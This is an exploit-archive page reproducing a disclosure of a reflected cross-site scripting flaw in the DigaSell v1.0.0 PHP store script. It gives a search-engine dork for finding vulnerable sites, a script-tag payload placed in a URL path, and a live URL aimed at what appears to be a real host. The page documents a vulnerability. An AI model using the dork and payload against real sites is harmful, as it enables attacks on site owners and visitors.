Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019060093

Below is a copy:

DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability
====================================================================================================================================
| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | 
| # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  
| # Dork      : "Copyright   DigaSell All Rights Reserved."                                                                       |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2
                  
[+] Panel       : https://codsem.com/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.